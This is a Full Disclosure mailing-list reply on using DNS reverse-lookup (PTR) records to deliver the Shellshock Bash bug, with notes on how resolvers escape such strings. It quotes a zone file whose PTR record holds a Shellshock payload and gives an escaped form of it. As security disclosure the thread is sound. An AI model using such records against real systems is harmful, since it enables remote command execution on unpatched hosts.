Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)

[Florian Weimer <fw () deneb enyo de>]

* Dirk-Willem van Gulik:

> Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem 
> unaffected in their stock install as libc/libresolver and DNS use 
> different escaping mechanisms (octal v.s. decimal).

More precisely, anything based on the historic BIND stub resolver code
(which is a lot) will escape certain characters while converting from
wire format to the textual representation, including "(", *and* also
has a check (res_hnok) which refuses PTR records which do not follow
the rather strict syntactic requirements for host names.

Lack of quoting in a DNS API at this point means that essentially
arbitrary garbage can leak into many other places, so this could well
expose vulnerabilities on such systems which are not present
elsewhere.

> A simple zone file; such as:
>
>      $TTL 10;
>      $ORIGIN in-addr.arpa.
>      @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
>                     666        ; serial
>                     360 180 3600 1800 ; very short lifespan.
>                     )
>      IN          NS     127.0.0.1
>      *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 

I'm surprised DNS servers grok this, should be

* IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.

Or something similar.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/